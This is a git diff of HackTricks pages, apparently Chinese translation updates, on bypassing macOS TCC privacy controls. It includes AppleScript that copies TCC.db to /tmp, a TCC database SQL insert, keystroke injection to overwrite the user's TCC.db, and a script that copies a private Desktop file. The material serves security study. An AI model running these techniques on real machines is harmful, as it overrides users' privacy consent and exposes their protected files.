@ -245,23 +248,23 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
<string>kTCCServiceAddressBook</string>
</array>
```
这将避免日历请求用户访问提醒事项、日历和通讯录
这将避免日历询问用户访问提醒、日历和地址簿
{% hint style="success" %}
除了一些关于权的官方文档外,还可以在[https://newosxbook.com/ent.jl](https://newosxbook.com/ent.jl)找到一些非官方的**有关授权的有趣信息**。
除了关于权一些官方文档外,还可以在 [**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl) 找到一些非官方的**有趣信息**。
{% endhint %}
一些TCC权限包括kTCCServiceAppleEvents、kTCCServiceCalendar、kTCCServicePhotos... 没有公开的列表定义了所有这些权限,但可以查看这个[**已知权限列表**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service)。
一些 TCC 权限包括kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... 没有公开的列表定义所有权限,但您可以查看这个 [**已知权限列表**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service)。
### 敏感保护位置
### 敏感未保护位置
* $HOME本身
* $HOME/.ssh$HOME/.aws 等
* $HOME/.ssh, $HOME/.aws 等
* /tmp
### 用户意图 / com.apple.macl
如前所述,可以通过将文件拖放到应用程序中来**授予应用程序对文件的访问权限**。这种访问权限不会在任何TCC数据库中指定而是作为文件的**扩展属性**。该属性将**存储允许应用程序的 UUID**
如前所述,可以通过将文件拖放到应用程序上来**授予应用程序访问文件的权限**。此访问权限不会在任何 TCC 数据库中指定,而是作为文件的**扩展** **属性**。此属性将**存储允许的应用程序的 UUID**
```bash
xattr Desktop/private.txt
com.apple.macl
@ -277,22 +280,22 @@ otool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| gr
uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
```
{% hint style="info" %}
有趣的是 **`com.apple.macl`** 属性由 **Sandbox** 管理,而不是 tccd。
有趣的是**`com.apple.macl`** 属性是由 **Sandbox** 管理的,而不是 tccd。
另请注意,如果您将允许计算机上应用程序的 UUID 的文件移动到不同的计算机,因为相同的应用程序将具有不同的 UID它不会授予该应用程序访问权限。
还要注意,如果你将允许计算机上某个应用的 UUID 的文件移动到另一台计算机,由于同一应用将具有不同的 UID它将无法授予该应用访问权限。
{% endhint %}
扩展属性 `com.apple.macl` **无法像其他扩展属性一样清除**,因为它受到 **SIP 保护**。但是,如[**在此文章中解释的**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/),可以通过**压缩**文件,**删除**文件,然后**解压缩**文件来禁用它。
扩展属性 `com.apple.macl` **无法像其他扩展属性那样被清除**,因为它是 **受 SIP 保护的**。然而,正如 [**在这篇文章中解释的**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/),可以通过 **压缩** 文件、**删除** 它并 **解压** 来禁用它。
## TCC权限提升和绕过
## TCC 权限提升与绕过
### 插入到TCC
### 插入到 TCC
如果您在某个时刻成功获得对 TCC 数据库的写访问权限,可以使用类似以下内容的方法添加条目(删除注释):
如果在某个时刻你设法获得对 TCC 数据库的写入访问权限,你可以使用以下内容添加条目(删除注释):
<details>
<summary>插入到TCC示例</summary>
<summary>插入到 TCC 示例</summary>
```sql
INSERT INTO access (
service,
@ -336,7 +339,7 @@ strftime('%s', 'now') -- last_reminded with default current timestamp
### TCC Payloads
如果您成功进入具有某些TCC权限的应用程序请查看以下页面中的TCC有效载荷以滥用它们
如果你成功进入了一个具有某些 TCC 权限的应用程序,请查看以下页面以获取 TCC 负载以进行滥用
{% content-ref url="macos-tcc-payloads.md" %}
[macos-tcc-payloads.md](macos-tcc-payloads.md)
@ -344,19 +347,22 @@ strftime('%s', 'now') -- last_reminded with default current timestamp
### Apple Events
了解有关苹果事件的信息
了解 Apple Events 的内容
{% content-ref url="macos-apple-events.md" %}
[macos-apple-events.md](macos-apple-events.md)
{% endcontent-ref %}
### 自动化FinderFDA\*
### Automation (Finder) to FDA\*
自动化权限的TCC名称是**`kTCCServiceAppleEvents`**\
此特定的TCC权限还指示了TCC数据库中可以被管理的**应用程序**(因此权限不允许仅仅管理所有内容)。
TCC 权限的名称是:**`kTCCServiceAppleEvents`**\
这个特定的 TCC 权限还指示了 **可以在 TCC 数据库中管理的应用程序**(因此权限并不允许管理所有内容)。
**Finder**是一个**始终具有FDA**即使它不显示在UI中的应用程序因此如果您对其具有**自动化**权限,您可以滥用其权限**执行一些操作**。\
在这种情况下,您的应用程序需要对**`com.apple.Finder`**的**`kTCCServiceAppleEvents`**权限。
**Finder** 是一个 **始终具有 FDA** 的应用程序(即使它在 UI 中不显示),因此如果你对它拥有 **Automation** 权限,你可以滥用其权限以 **执行某些操作**。\
在这种情况下,你的应用程序需要对 **`com.apple.Finder`** 拥有权限 **`kTCCServiceAppleEvents`**。
{% tabs %}
{% tab title="Steal users TCC.db" %}
```applescript
# This AppleScript will copy the system TCC database into /tmp
osascript<<EOD
@ -383,25 +389,25 @@ EOD
{% endtab %}
{% endtabs %}
您可以滥用此功能来**编写自己的用户TCC数据库**。
你可以利用这个来**编写你自己的用户 TCC 数据库**。
{% hint style="warning" %}
有了这个权限,您将能够**要求查找器访问TCC受限文件夹**并提供文件,但据我所知,您**无法让Finder执行任意代码**来充分滥用他的FDA访问权限。
拥有这个权限后,你将能够**请求 Finder 访问 TCC 限制的文件夹**并获取文件,但据我所知,你**无法让 Finder 执行任意代码**以完全滥用其 FDA 访问权限。
因此,您将无法滥用完整的FDA功能
因此,你将无法滥用完整的 FDA 能力
{% endhint %}
这是获取Finder上的自动化权限的TCC提示:
这是获取 Finder 自动化权限的 TCC 提示:
<figure><img src="../../../../.gitbook/assets/image (27).png" alt="" width="244"><figcaption></figcaption></figure>
{% hint style="danger" %}
请注意,因为**Automator**应用程序具有TCC权限**`kTCCServiceAppleEvents`**,它可以**控制任何应用程序**比如Finder。因此拥有控制Automator的权限您也可以使用下面的代码控制**Finder**
请注意,由于 **Automator** 应用具有 TCC 权限 **`kTCCServiceAppleEvents`**,它可以**控制任何应用**,如 Finder。因此拥有控制 Automator 的权限后,你也可以使用如下代码控制 **Finder**
{% endhint %}
<details>
<summary>Automator中获取一个shell</summary>
<summary> Automator 中获取 shell</summary>
```applescript
osascript<<EOD
set theScript to "touch /tmp/something"
@ -423,11 +429,11 @@ EOD
```
</details>
同样适用于**脚本编辑器应用程序**它可以控制Finder但是使用AppleScript你无法强制其执行脚本。
同样的情况发生在 **Script Editor app**,它可以控制 Finder但使用 AppleScript 你无法强制它执行脚本。
### 自动化SE到一些TCC
### 自动化 (SE) 到某些 TCC
**系统事件可以创建文件夹操作,文件夹操作可以访问一些TCC文件夹**(桌面、文稿和下载),因此可以使用以下脚本来滥用这种行为:
**系统事件可以创建文件夹操作,而文件夹操作可以访问一些 TCC 文件夹**(桌面、文档和下载),因此可以使用如下脚本来利用这种行为:
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
@ -469,11 +475,11 @@ EOD
touch "$HOME/Desktop/file"
rm "$HOME/Desktop/file"
```
### 自动化SE+ 辅助功能(**`kTCCServicePostEvent`|**`kTCCServiceAccessibility`**)到 FDA\*
### Automation (SE) + Accessibility (**`kTCCServicePostEvent`|**`kTCCServiceAccessibility`**)** to FDA\*
**`System Events`** 上的自动化 + 辅助功能(**`kTCCServicePostEvent`**)允许发送**按键到进程**。这样,您可以滥用 Finder 来更改用户的 TCC.db 或为任意应用程序提供 FDA尽管可能需要提示输入密码)。
**`System Events`** 上的自动化 + 可访问性 (**`kTCCServicePostEvent`**) 允许向进程发送 **按键**。通过这种方式,您可以滥用 Finder 来更改用户的 TCC.db 或将 FDA 授予任意应用程序(尽管可能会提示输入密码)。
Finder 覆盖用户 TCC.db 示例:
Finder 覆盖用户 TCC.db 示例:
```applescript
-- store the TCC.db file to copy in /tmp
osascript <<EOF
@ -519,48 +525,46 @@ keystroke "v" using {command down}
end tell
EOF
```
### `kTCCServiceAccessibility` to FDA\*
### `kTCCServiceAccessibility` FDA\*
查看此页面以获取一些[**滥用辅助功能权限的有效载荷**](macos-tcc-payloads.md#accessibility)来提升权限至FDA\*或例如运行键盘记录器
查看此页面以获取一些 [**滥用可访问性权限的有效载荷**](macos-tcc-payloads.md#accessibility) 以提升到 FDA\* 或运行键盘记录器,例如
### **Endpoint Security Client to FDA**
### **端点安全客户端到 FDA**
如果你有**`kTCCServiceEndpointSecurityClient`**你就有FDA。结束。
如果你有 **`kTCCServiceEndpointSecurityClient`**,你就有 FDA。结束。
### System Policy SysAdmin File to FDA
### 系统策略系统管理员文件到 FDA
**`kTCCServiceSystemPolicySysAdminFiles`** 允许**更改**用户的**`NFSHomeDirectory`**属性,从而更改用户的主文件夹,因此可以**绕过TCC**
**`kTCCServiceSystemPolicySysAdminFiles`** 允许 **更改** 用户的 **`NFSHomeDirectory`** 属性,这会更改他的主文件夹,从而允许 **绕过 TCC**
### User TCC DB to FDA
### 用户 TCC 数据库到 FDA
获得对**用户TCC**数据库的**写入权限**,你无法授予自己**`FDA`**权限,只有位于系统数据库中的权限可以授予。
获得 **用户 TCC** 数据库的 **写权限** 你 \*\*不能\*\* 授予自己 **`FDA`** 权限,只有系统数据库中的用户可以授予。
是你可以给自己**`对Finder的自动化权限`**,并滥用先前的技术来提升至FDA\*。
你可以 **授予** 自己 **`Finder 的自动化权限`**,并滥用之前的技术提升到 FDA\*。
### **FDA to TCC permissions**
### **FDA 到 TCC 权限**
**全磁盘访问**在TCC中的名称是**`kTCCServiceSystemPolicyAllFiles`**
**全磁盘访问** TCC 中的名称是 **`kTCCServiceSystemPolicyAllFiles`**
不认为这是一个真正的权限提升但以防万一你觉得有用如果你控制了一个具有FDA的程序你可以**修改用户的TCC数据库并授予自己任何访问权限**。这可以作为一种持久性技术在你可能失去FDA权限时有用
认为这不是真正的权限提升,但以防你觉得有用:如果你控制一个具有 FDA 的程序,你可以 **修改用户的 TCC 数据库并授予自己任何访问权限**。这可以作为一种持久性技术,以防你可能失去 FDA 权限
### **SIP Bypass to TCC Bypass**
### **SIP 绕过到 TCC 绕过**
系统的**TCC数据库**受到**SIP**的保护,因此只有具有**指定赋权**的进程才能修改它。因此,如果攻击者找到了**SIP绕过**能够修改受SIP限制的文件),他将能够:
系统 **TCC 数据库** 受到 **SIP** 保护,这就是为什么只有具有 **指示的权限** 的进程才能修改它。因此,如果攻击者找到一个 **SIP 绕过** 通过一个 **文件**(能够修改一个受 SIP 限制的文件),他将能够:
* **移除TCC数据库的保护**并赋予自己所有TCC权限。例如他可以滥用以下任何文件
* TCC系统数据库
* **移除 TCC 数据库的保护**,并授予自己所有 TCC 权限。他可以滥用这些文件中的任何一个,例如
* TCC 系统数据库
* REG.db
* MDMOverrides.plist
然而,还有另一种选择可以滥用这个**SIP绕过来绕过TCC**,文件`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`是一个需要TCC例外的应用程序允许列表。因此如果攻击者可以**移除此文件的SIP保护**并添加自己的**应用程序**该应用程序将能够绕过TCC。\
例如,要添加终端:
然而,还有另一种选择可以滥用这个 **SIP 绕过来绕过 TCC**,文件 `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` 是一个需要 TCC 例外的应用程序允许列表。因此,如果攻击者可以 **移除此文件的 SIP 保护** 并添加**自己的应用程序**,该应用程序将能够绕过 TCC。\
例如添加终端:
```bash
# Get needed info
codesign -d -r- /System/Applications/Utilities/Terminal.app
```
### AllowApplicationsList.plist:
### 允许应用程序列表.plist
AllowApplicationsList.plist:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -583,29 +587,30 @@ codesign -d -r- /System/Applications/Utilities/Terminal.app
</dict>
</plist>
```
### TCC绕过
### TCC 绕过
{% content-ref url="macos-tcc-bypasses/" %}
[macos-tcc-bypasses](macos-tcc-bypasses/)
{% endcontent-ref %}
## 参考资料
## 参考文献
* [**https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive)
* [**https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command**](https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command)
* [**https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/)
* [**https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/**](https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

46
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
View file

@ -1,46 +1,48 @@
# macOS苹果事件
# macOS Apple Events
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 基本信息
**苹果事件**是苹果macOS中的一个功能允许应用程序相互通信。它们是**苹果事件管理器**的一部分是macOS操作系统的一个组件负责处理进程间通信。该系统使一个应用程序能够向另一个应用程序发送消息,请求执行特定操作,如打开文件、检索数据或执行命令。
**Apple Events** 是苹果 macOS 中的一个功能,允许应用程序相互通信。它们是 **Apple Event Manager** 的一部分,该组件负责处理进程间通信。该系统使一个应用程序能够向另一个应用程序发送消息,请求执行特定操作,如打开文件、检索数据或执行命令。
`mina`守护进程是`/System/Library/CoreServices/appleeventsd`,注册了服务`com.apple.coreservices.appleevents`
mina 守护进程是 `/System/Library/CoreServices/appleeventsd`,它注册了服务 `com.apple.coreservices.appleevents`
每个能够接收事件的应用程序都会通过提供其苹果事件Mach端口与此守护进程进行检查。当应用程序想要向其发送事件时应用程序将从守护进程请求此端口。
每个可以接收事件的应用程序都会与此守护进程检查,提供其 Apple Event Mach Port。当一个应用程序想要向其发送事件时该应用程序将向守护进程请求此端口。
沙盒应用程序需要权,如`allow appleevent-send`和`(allow mach-lookup (global-name "com.apple.coreservices.appleevents))`,才能发送事件。注意,像`com.apple.security.temporary-exception.apple-events`这样的授权可能会限制谁可以访问发送事件,这将需要像`com.apple.private.appleevents`这样的授权。
沙盒应用程序需要权,如 `allow appleevent-send` `(allow mach-lookup (global-name "com.apple.coreservices.appleevents))`,才能发送事件。注意,像 `com.apple.security.temporary-exception.apple-events` 这样的授权可能会限制谁可以发送事件,这将需要像 `com.apple.private.appleevents` 这样的授权。
{% hint style="success" %}
可以使用环境变量**`AEDebugSends`**来记录发送的消息信息:
可以使用环境变量 **`AEDebugSends`** 来记录发送的消息信息:
```bash
AEDebugSends=1 osascript -e 'tell application "iTerm" to activate'
```
{% endhint %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

290
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
View file

@ -1,24 +1,27 @@
# macOS TCC绕过
# macOS TCC Bypasses
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{% endhint %}
{% endhint %}
## 按功能分类
### 写入绕过
这不是绕过这只是TCC的工作原理**它不会阻止写入**。如果终端**无法访问用户的桌面以读取内容,它仍然可以写入其中**
这不是一个绕过这只是TCC的工作方式**它不防止写入**。如果终端**没有权限读取用户的桌面,它仍然可以写入其中**
```shell-session
username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
@ -28,58 +31,58 @@ ls: Desktop: Operation not permitted
username@hostname ~ % cat Desktop/lalala
asd
```
**扩展属性 `com.apple.macl`** 被添加到新的 **文件** 中,以便让 **创建者的应用** 能够读取它
The **extended attribute `com.apple.macl`** 被添加到新的 **file** 以便给 **creators app** 访问读取它的权限
### TCC 点击劫持
### TCC ClickJacking
可以**将一个窗口覆盖在 TCC 提示框上**,使用户在不知情的情况下**接受**它。您可以在 [**TCC-ClickJacking**](https://github.com/breakpointHQ/TCC-ClickJacking)** 中找到一个 PoC**
可以 **在 TCC 提示上放置一个窗口**,使用户 **接受** 而不注意。你可以在 [**TCC-ClickJacking**](https://github.com/breakpointHQ/TCC-ClickJacking)** 中找到一个 PoC**
<figure><img src="broken-reference" alt=""><figcaption><p><a href="https://github.com/breakpointHQ/TCC-ClickJacking/raw/main/resources/clickjacking.jpg">https://github.com/breakpointHQ/TCC-ClickJacking/raw/main/resources/clickjacking.jpg</a></p></figcaption></figure>
### 通过任意名称请求 TCC
### TCC Request by arbitrary name
攻击者可以**`Info.plist`** 中创建任何名称的应用程序(例如 Finder、Google Chrome...),并让其请求访问某些受 TCC 保护的位置。用户会认为请求此访问权限的是合法应用程序。\
此外,可以**将合法应用程序从 Dock 中移除,并将伪造的应用程序放在其中**,因此当用户点击伪造的应用程序(可以使用相同的图标)时,它可能调用合法应用程序,请求 TCC 权限并执行恶意软件,使用户相信合法应用程序请求了访问权限
攻击者可以 **创建任何名称的应用**(例如 Finder、Google Chrome...)在 **`Info.plist`** 中,并使其请求访问某些 TCC 保护的位置。用户会认为是合法应用在请求此访问。\
此外,可以 **从 Dock 中移除合法应用并将假应用放上去**,因此当用户点击假应用(可以使用相同的图标)时,它可以调用合法应用,请求 TCC 权限并执行恶意软件,使用户相信合法应用请求了访问。
<figure><img src="https://lh7-us.googleusercontent.com/Sh-Z9qekS_fgIqnhPVSvBRmGpCXCpyuVuTw0x5DLAIxc2MZsSlzBOP7QFeGo_fjMeCJJBNh82f7RnewW1aWo8r--JEx9Pp29S17zdDmiyGgps1hH9AGR8v240m5jJM8k0hovp7lm8ZOrbzv-RC8NwzbB8w=s2048" alt="" width="375"><figcaption></figcaption></figure>
更多信息和 PoC 请参阅
更多信息和 PoC
{% content-ref url="../../../macos-privilege-escalation.md" %}
[macos-privilege-escalation.md](../../../macos-privilege-escalation.md)
{% endcontent-ref %}
### SSH 绕过
### SSH Bypass
默认情况下,通过 **SSH 访问** 具有 **"完全磁盘访问权限"**。为了禁用此权限,您需要将其列出但禁用(从列表中删除它不会删除这些权限):
默认情况下,通过 **SSH 的访问曾经具有 "完全磁盘访问"**。为了禁用此功能,你需要将其列出但禁用(从列表中移除不会删除这些权限):
![](<../../../../../.gitbook/assets/image (1077).png>)
在这里,您可以找到一些**恶意软件如何绕过此保护**的示例:
在这里你可以找到一些 **恶意软件如何能够绕过此保护** 的示例:
* [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/)
{% hint style="danger" %}
请注意,现在,为了能够启用 SSH您需要**完全磁盘访问权限**
请注意,现在要启用 SSH 你需要 **完全磁盘访问**
{% endhint %}
### 处理扩展名 - CVE-2022-26767
### Handle extensions - CVE-2022-26767
属性 **`com.apple.macl`** 被赋予文件以赋予**某个应用程序读取权限**。当**拖放**文件到应用程序上或用户**双击**文件以使用**默认应用程序**打开文件时,将设置此属性
属性 **`com.apple.macl`** 被赋予文件以给予 **某个应用读取它的权限。****拖放** 文件到应用上,或当用户 **双击** 文件以使用 **默认应用** 打开时,此属性被设置
因此,用户可以**注册一个恶意应用程序**来处理所有扩展名,并调用启动服务来**打开**任何文件(因此恶意文件将被授予读取权限)。
因此,用户可以 **注册一个恶意应用** 来处理所有扩展并调用 Launch Services 来 **打开** 任何文件(因此恶意文件将被授予读取权限)。
### iCloud
**`com.apple.private.icloud-account-access`** 可以与 **`com.apple.iCloudHelper`** XPC 服务通信,后者将**提供 iCloud 令牌**
**`com.apple.private.icloud-account-access`** 使得与 **`com.apple.iCloudHelper`** XPC 服务进行通信成为可能,该服务将 **提供 iCloud 令牌**
**iMovie** 和 **Garageband** 具有此授权以及其他授权
**iMovie** 和 **Garageband** 拥有此权限以及其他允许的权限
有关从该授权中获取 iCloud 令牌的漏洞的更多**信息**,请查看演讲:[**#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula**](https://www.youtube.com/watch?v=_6e2LhmxVc0)
有关从该权限 **获取 iCloud 令牌** 的漏洞的更多 **信息**,请查看演讲:[**#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula**](https://www.youtube.com/watch?v=\_6e2LhmxVc0)
### kTCCServiceAppleEvents / 自动化
### kTCCServiceAppleEvents / Automation
具有 **`kTCCServiceAppleEvents`** 权限的应用程序将能够**控制其他应用程序**。这意味着它可能能够**滥用授予其他应用程序的权限**
具有 **`kTCCServiceAppleEvents`** 权限的应用将能够 **控制其他应用**。这意味着它可能会 **滥用授予其他应用的权限**
有关 Apple 脚本的更多信息,请查看:
@ -87,13 +90,13 @@ asd
[macos-apple-scripts.md](macos-apple-scripts.md)
{% endcontent-ref %}
例如,如果一个应用程序具有**对 `iTerm` 的自动化权限**,例如在此示例中**`Terminal`** 对 iTerm 有访问权限:
例如,如果一个应用`iTerm` 具有 **自动化权限**,例如在这个例子中 **`Terminal`** 对 iTerm 具有访问权限:
<figure><img src="../../../../../.gitbook/assets/image (981).png" alt=""><figcaption></figcaption></figure>
#### 对 iTerm 的控制
#### Over iTerm
没有 FDA 的 Terminal 可以调用具有 FDA 的 iTerm并使用它执行操作:
Terminal没有 FDA可以调用 iTermiTerm 拥有它,并用它来执行操作:
{% code title="iterm.script" %}
```applescript
@ -107,35 +110,13 @@ write text "cp ~/Desktop/private.txt /tmp"
end tell
end tell
```
{% endcode %}
### macOS TCC Bypasses
#### Introduction
This repository contains various macOS TCC (Transparency, Consent, and Control) bypass techniques. TCC is a macOS security feature that protects user privacy by requesting user approval before allowing applications to access certain sensitive data.
#### Contents
1. **bypass-photos-library.md**: This file explains a technique to bypass TCC restrictions and access the Photos library without user consent.
2. **bypass-microphone.md**: Here, you can find a method to bypass TCC controls and access the microphone without user authorization.
